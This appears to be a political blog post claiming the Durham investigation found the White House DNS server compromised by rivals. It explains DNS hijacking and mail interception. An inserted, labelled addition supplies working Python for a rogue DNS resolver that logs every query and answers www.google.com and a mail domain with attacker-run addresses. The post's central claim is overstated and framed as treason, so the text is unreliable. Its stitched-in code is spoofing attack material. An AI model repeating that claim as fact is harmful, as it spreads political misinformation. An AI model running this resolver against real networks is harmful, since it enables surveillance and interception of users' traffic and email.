It’s all over the news. The Durham investigation finds that the DNS server in the White House during the Trump presidency was compromised by political rivals. But what is a DNS server, what is it for, and what can you do with one? If you watch the news, the left-wing networks are throwing up their arms and saying it is no big deal; after all, a DNS server only sees basic data. The right-wing networks are screaming espionage. Whom to believe, and how big an issue is this? The reality is that both claims are technically true, but the rabbit hole goes significantly deeper than what we are hearing.
I am going to talk about what a DNS server is and what I can do with one, and I will try to keep it as simple as possible.
What is a DNS Server?
DNS stands for “Domain Name System.” OK, that probably didn’t help much for most readers. Imagine you are sitting here reading this on your computer, phone, or tablet right now. You decide you want to go to www.google.com. How does your device know how to find www.google.com?
It doesn’t. Your device only understands IP addresses, strings of numbers like 203.0.113.111 (a made-up address from a range reserved for examples).
The internet would be a much more complicated place if we needed to remember all of these numbers, right? So in the early days of the internet, DNS was created to let us use friendly, easy-to-remember names for everything. For example, if you come to my blog by typing www.scrybe.com into a browser, your device contacts a DNS server to ask where to find www.scrybe.com. The DNS Server will reply, saying it is at 220.127.116.11, and your device will find the blog.
But if I controlled the DNS server your device uses, well… I could send you anywhere I want when you enter that address, and that anywhere can do all kinds of really nasty stuff, and you would never have a clue.
So, in the simplest terms, DNS is the phone book of the internet. You type in a web address (or send to an email address), and behind the scenes your device contacts a DNS server somewhere to ask where to go. The server answers with the IP address, and your device gets you where you wanted to go in milliseconds. At least, that is what normally happens.
You probably know nothing about this, because when you connect to the internet, your devices are automatically configured to use the DNS servers your internet provider chooses. But in the very early days of the internet, if you were running a website, you had to either find someone to host your DNS with, or you had to run your own. The latter was very complicated.
What’s in an Expert?
These days, the word “expert” seems to be thrown around for just about anything, but I would say I am a pretty reliable resource in the world of experts on this topic. As I mentioned above, in the early days of the internet, running a DNS server was very complicated, and I ran a software company that specialized in creating Windows software for internet providers.
We realized that there was a great need for an easier-to-use DNS server, so we set out to create the first DNS server for Windows. So, to be clear, I know DNS well because I designed a DNS server and we created one. But I have also been managing multiple DNS servers for twenty-eight years.
What Can I Do With a DNS Server?
These servers are meant to simply act as a phonebook of sorts to help your devices go to the servers you want them to when you open a web page or send an email—or any of the other things one does on the internet. But what they are meant to do and what they can do make all the difference in the world.
At a minimum, and with almost no effort, if I set up your devices to use my DNS servers, I am able to log every website you visit. This can be very useful for data mining. For example, Google runs the most popular public DNS servers in the world for free. Millions of people use them. Do you think they are offering this service out of the kindness of their hearts, or is it more likely that they find value in knowing every website or other internet server your computer goes to, even if you are not using their search engine? That kind of data is priceless.
What if I Had More Nefarious Intentions?
This is where it gets scary. I can log all of that data and send you on your way, and you never know a thing. A firewall does not help: your device has to be allowed to talk to its DNS server, or nothing works. And if I have the power to know where you want to go on the internet and to direct your device to the proper location, I also have the power to change that location.
Now consider the ramifications. I may see you frequently go to Google to search. Normally, a DNS server cannot see what you are searching for. But with a little effort, I can make a website that looks and acts exactly like Google and instruct your devices to go to my server when you think you are going to Google. The address bar would even show www.google.com, and when you search, my server could fetch real results from Google and hand them back. Now I know exactly what you are searching for and exactly where you are going. One thing does stand in the way on modern sites: if the connection uses HTTPS, your browser checks that the server holds a certificate for www.google.com, which my look-alike cannot get from a public certificate authority, so you would see a certificate warning. The attack runs cleanly against plain HTTP, against anyone who clicks past the warning, or on a device where I have also installed a certificate authority it trusts.
It doesn’t matter where you go or what you are doing; I have hijacked all outbound connections. VPN? No problem, as long as your DNS queries still come to me, which is the case with a split-tunnel VPN or one that leaves your system resolver alone. Only a VPN that routes every query through its own resolver takes me out of the picture. Do you like the privacy of a search engine like DuckDuckGo or a browser like Brave? Me too, but if I have hijacked your DNS, none of that matters at all.
But I can kick that up a notch. When you send an email, your device asks DNS where your outgoing mail server is, so I learn which mail server you use (but not the message itself, since the contents never pass through DNS). That is enough for me to set up my own server that behaves exactly like yours, point your device at it, copy every email you send, and then relay it to the real server so that it arrives normally and you never notice. The whole detour takes only a moment. Again, a mail client that verifies its server’s TLS certificate will complain unless I have also gotten it to trust a certificate of mine.
I now have a copy of every email you send. I cannot see the emails people send you, but I sure can see what they wrote if you are replying to them.
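Here is a toy version of the three things described in the last few sections (logging every name asked for, answering www.google.com with a look-alike server, and pointing a mail domain at a rogue relay), as an added example and not code from the original post. It speaks real DNS wire format (RFC 1035) but everything in it is constructed: the "upstream" answers, the override table, and the addresses (203.0.113.x and 198.51.100.x are documentation ranges; mx.evil.example is hypothetical). Compression pointers in incoming queries are not handled, which is fine for the queries it builds itself.

```python
"""Toy rogue DNS resolver (constructed example, not from the original post).

It parses real DNS wire-format queries (RFC 1035), logs every name asked
for, answers most names truthfully from a stand-in 'upstream' table, and
rewrites the answers for chosen names: the A record for www.google.com
points at an attacker-run web server, and the MX record for one mail
domain points at an attacker-run relay.  Runs entirely offline.
"""
import struct

TYPE_A, TYPE_MX = 1, 15

# Hypothetical attacker infrastructure (documentation-range addresses).
ATTACKER_WEB_IP = "203.0.113.10"      # the fake Google look-alike
ATTACKER_MX_HOST = "mx.evil.example"  # the fake mail relay

# Constructed stand-in for what an honest upstream resolver would return.
UPSTREAM = {
    ("www.google.com", TYPE_A): "198.51.100.20",   # not Google's real address
    ("www.scrybe.com", TYPE_A): "220.127.116.11",  # the address quoted in the post
    ("example.org", TYPE_MX): "mail.example.org",
}

# Names the rogue resolver lies about instead of answering truthfully.
OVERRIDES = {
    ("www.google.com", TYPE_A): ATTACKER_WEB_IP,
    ("example.org", TYPE_MX): ATTACKER_MX_HOST,
}

QUERY_LOG = []  # every (name, qtype) the resolver is ever asked about


def encode_name(name):
    """'www.google.com' -> b'\\x03www\\x06google\\x03com\\x00' (RFC 1035 labels)."""
    labels = [p.encode() for p in name.rstrip(".").split(".")]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"


def decode_name(data, offset):
    """Inverse of encode_name; returns (name, offset just past the root label)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compression pointers not handled in this toy")
        labels.append(data[offset:offset + length].decode())
        offset += length


def build_query(txid, name, qtype):
    """Client side: a standard recursive query with one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)  # class IN


def parse_query(packet):
    txid = struct.unpack("!H", packet[:2])[0]
    name, off = decode_name(packet, 12)           # question starts after 12-byte header
    qtype = struct.unpack("!H", packet[off:off + 2])[0]
    return txid, name, qtype, packet[12:off + 4]  # echo the whole question section back


def rdata_for(qtype, value):
    if qtype == TYPE_A:
        return bytes(int(o) for o in value.split("."))     # 4 raw octets
    if qtype == TYPE_MX:
        return struct.pack("!H", 10) + encode_name(value)  # preference + exchange
    raise ValueError("unsupported type %d" % qtype)


def handle(packet):
    """Server side: log, then answer from OVERRIDES first and UPSTREAM second."""
    txid, name, qtype, question = parse_query(packet)
    QUERY_LOG.append((name, qtype))                 # the surveillance part
    key = (name.lower(), qtype)
    value = OVERRIDES.get(key, UPSTREAM.get(key))   # the hijack part
    if value is None:
        # QR=1 RD=1 RA=1 RCODE=3 (NXDOMAIN), no answers
        return struct.pack("!HHHHHH", txid, 0x8183, 1, 0, 0, 0) + question
    rdata = rdata_for(qtype, value)
    # Answer name is a pointer (0xC00C) back to the question name at offset 12.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", qtype, 1, 60, len(rdata)) + rdata
    return struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0) + question + answer


def parse_answer(response):
    """Client side: pull (name, type, value) out of the single-answer replies above."""
    ancount = struct.unpack("!H", response[6:8])[0]
    if ancount == 0:
        return None
    name, off = decode_name(response, 12)
    off += 4 + 2                                   # skip qtype/qclass, then the 0xC00C pointer
    atype, _cls, _ttl, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    rdata = response[off + 10:off + 10 + rdlen]
    if atype == TYPE_A:
        return name, atype, ".".join(str(b) for b in rdata)
    return name, atype, decode_name(rdata, 2)[0]   # MX: skip the 2-byte preference


if __name__ == "__main__":
    for qname, qtype in [("www.google.com", TYPE_A), ("www.scrybe.com", TYPE_A),
                         ("example.org", TYPE_MX)]:
        print(parse_answer(handle(build_query(0x1234, qname, qtype))))
    print("seen:", QUERY_LOG)
```

Put `handle()` behind a UDP socket bound to port 53 and the same code would serve real clients. The point to notice is that the spoofed reply and the truthful reply are byte-for-byte the same shape; only the value differs, and the client has no way to tell from the packet alone. That is why the defence has to live above DNS (TLS certificate checks in the browser or mail client, or DNSSEC validation on the client side), not in the resolver the network hands you.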
This Just Scratches the Surface
What I described are just a few simple examples. The bigger point here is that if I control the DNS server you are using, I also control where all of your outbound connections go, and how they operate. I can steal all kinds of information, and you think your firewall or VPN is protecting you. All of this is behind the scenes in such a way that no red flags go up.
How Serious Is This?
Imagine you had an adversary that was able to bug every room in your building. This can easily be the internet version of that. I don’t care who the president is, which party they belong to, or whether you love him or hate him. If this had been a foreign government doing this, it would be one of the most (if not the most) successful espionage operations in history. If an American did this, it is surely one of the greatest acts of treason in history. If a group of Americans did this, it is one of the biggest conspiracies to commit treason in history.
By comparison, Watergate was like knocking on a soda machine for a free coke.
Whatever you think of this, please sit back and recognize that the level of corruption we have gotten to is unthinkable. Some kid hacker could not have done this. It could only have been done as a very coordinated effort that included people in charge of network security at the White House. How does that happen? How big does this have to be to get to that level?
It is Not Just About the President
Most people probably think this specifically targeted Trump, as if targeting just Trump would be OK. But on a network, those in charge of IT do not set DNS on just one computer; they set it for the entire network. This means it would have been happening to every device connected to the internet in the White House. It is also very possible that inside traffic (traffic between devices on the network inside the White House) was similarly compromised.
Someone on the inside had to know. To believe otherwise would be to believe that the Secret Service leaves the White House gate untended and forgets to lock it.
Look it Up
This is where we get some hacking terms you may have heard of, like “Man in the Middle” attacks and “DNS Spoofing”. Simply search for those terms if you want to do a deep dive, or check out some of these sources: